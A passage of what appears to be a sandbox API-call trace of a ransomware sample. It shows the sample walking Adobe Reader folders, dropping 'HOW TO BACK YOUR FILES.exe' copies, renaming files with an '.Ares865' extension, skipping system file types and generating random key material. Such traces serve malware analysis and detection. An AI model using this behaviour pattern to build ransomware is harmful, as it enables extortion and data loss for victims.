RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0155.126] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" [0155.127] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode" [0155.127] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.127] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.128] GetLastError () returned 0x0 [0155.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0155.128] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0155.128] CloseHandle (hObject=0x120) returned 1 [0155.128] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.128] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x53eb7420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53eb7420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.128] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.129] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.129] lstrcpyW (in: lpString1=0x2cce48c, lpString2="ICU" | out: lpString1="ICU") returned="ICU" [0155.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79a8 [0155.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x31afc8 [0155.129] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79b0 | out: ListHead=0x2e7710, ListEntry=0x2e79b0) returned 0x2e7990 [0155.129] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mappings", cAlternateFileName="")) returned 1 [0155.129] lstrcmpiW (lpString1="Mappings", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.129] lstrcmpiW (lpString1="Mappings", lpString2="aoldtz.exe") returned 1 [0155.129] lstrcpyW (in: lpString1=0x2cce48c, lpString2="Mappings" | out: lpString1="Mappings") returned="Mappings" [0155.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0155.129] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9e) returned 0x320fc8 [0155.129] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0155.129] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mappings", cAlternateFileName="")) returned 0 [0155.129] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.129] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0155.129] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" [0155.130] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings" [0155.130] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.130] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.131] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.131] GetLastError () returned 0x0 [0155.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0155.131] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0155.131] CloseHandle (hObject=0x120) returned 1 [0155.132] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.132] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.132] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.132] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.132] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0155.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0155.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xaa) returned 0x2e8890 [0155.132] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0155.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x540341e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0155.132] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0155.132] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x834450e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5405a340, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5405a340, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mac", cAlternateFileName="")) returned 1 [0155.132] lstrcmpiW (lpString1="Mac", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.132] lstrcmpiW (lpString1="Mac", lpString2="aoldtz.exe") returned 1 [0155.132] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Mac" | out: lpString1="Mac") returned="Mac" [0155.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0155.132] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2f2fc8 [0155.132] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0155.133] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win", cAlternateFileName="")) returned 1 [0155.133] lstrcmpiW (lpString1="win", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.133] lstrcmpiW (lpString1="win", lpString2="aoldtz.exe") returned 1 [0155.133] lstrcpyW (in: lpString1=0x2cce49e, lpString2="win" | out: lpString1="win") returned="win" [0155.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7aa8 [0155.133] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa6) returned 0x2f3078 [0155.133] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ab0 | out: ListHead=0x2e7710, ListEntry=0x2e7ab0) returned 0x2e7bb0 [0155.133] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="win", cAlternateFileName="")) returned 0 [0155.133] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.133] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ab0 [0155.133] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" [0155.133] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win" [0155.133] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.133] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.134] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.135] GetLastError () returned 0x0 [0155.135] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0155.135] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0155.135] CloseHandle (hObject=0x120) returned 1 [0155.135] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.135] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x833608a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x540341e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540341e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.135] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.135] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.136] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1250.TXT" | out: lpString1="CP1250.TXT") returned="CP1250.TXT" [0155.136] lstrlenW (lpString="CP1250.TXT") returned 10 [0155.136] lstrlenW (lpString="Ares865") returned 7 [0155.136] lstrcmpiW (lpString1="250.TXT", lpString2="Ares865") returned -1 [0155.136] lstrlenW (lpString=".dll") returned 4 [0155.136] lstrcmpiW (lpString1="CP1250.TXT", lpString2=".dll") returned 1 [0155.136] lstrlenW (lpString=".lnk") returned 4 [0155.136] lstrcmpiW (lpString1="CP1250.TXT", lpString2=".lnk") returned 1 [0155.136] lstrlenW (lpString=".ini") returned 4 [0155.136] lstrcmpiW (lpString1="CP1250.TXT", lpString2=".ini") returned 1 [0155.136] lstrlenW (lpString=".sys") returned 4 [0155.136] lstrcmpiW (lpString1="CP1250.TXT", lpString2=".sys") returned 1 [0155.136] lstrlenW (lpString="CP1250.TXT") returned 10 [0155.136] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.Ares865") returned 101 [0155.136] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt.ares865"), dwFlags=0x1) returned 1 [0155.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1250.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1250.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9828) returned 1 [0155.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.139] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.140] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.140] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.142] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.143] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.143] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.144] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1251.TXT" | out: lpString1="CP1251.TXT") returned="CP1251.TXT" [0155.144] lstrlenW (lpString="CP1251.TXT") returned 10 [0155.144] lstrlenW (lpString="Ares865") returned 7 [0155.144] lstrcmpiW (lpString1="251.TXT", lpString2="Ares865") returned -1 [0155.144] lstrlenW (lpString=".dll") returned 4 [0155.144] lstrcmpiW (lpString1="CP1251.TXT", lpString2=".dll") returned 1 [0155.144] lstrlenW (lpString=".lnk") returned 4 [0155.144] lstrcmpiW (lpString1="CP1251.TXT", lpString2=".lnk") returned 1 [0155.144] lstrlenW (lpString=".ini") returned 4 [0155.144] lstrcmpiW (lpString1="CP1251.TXT", lpString2=".ini") returned 1 [0155.144] lstrlenW (lpString=".sys") returned 4 [0155.144] lstrcmpiW (lpString1="CP1251.TXT", lpString2=".sys") returned 1 [0155.144] lstrlenW (lpString="CP1251.TXT") returned 10 [0155.144] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.Ares865") returned 101 [0155.145] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt.ares865"), dwFlags=0x1) returned 1 [0155.146] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1251.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1251.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.146] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9503) returned 1 [0155.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.146] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.147] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.147] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.147] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.150] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.150] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.150] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.151] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1252.TXT" | out: lpString1="CP1252.TXT") returned="CP1252.TXT" [0155.151] lstrlenW (lpString="CP1252.TXT") returned 10 [0155.151] lstrlenW (lpString="Ares865") returned 7 [0155.151] lstrcmpiW (lpString1="252.TXT", lpString2="Ares865") returned -1 [0155.151] lstrlenW (lpString=".dll") returned 4 [0155.151] lstrcmpiW (lpString1="CP1252.TXT", lpString2=".dll") returned 1 [0155.152] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.Ares865") returned 101 [0155.152] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt.ares865"), dwFlags=0x1) returned 1 [0155.153] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1252.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1252.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.153] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9653) returned 1 [0155.153] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0155.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4800 [0155.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0155.154] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0155.154] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.154] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.157] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0155.158] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.158] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0155.158] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="CP1253.TXT" | out: lpString1="CP1253.TXT") returned="CP1253.TXT" [0155.159] lstrlenW (lpString="CP1253.TXT") returned 10 [0155.159] lstrlenW (lpString="Ares865") returned 7 [0155.159] lstrcmpiW (lpString1="253.TXT", lpString2="Ares865") returned -1 [0155.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.Ares865") returned 101 [0155.159] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt.ares865"), dwFlags=0x1) returned 1 [0155.161] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\TypeSupport\\Unicode\\Mappings\\win\\CP1253.TXT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\typesupport\\unicode\\mappings\\win\\cp1253.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, 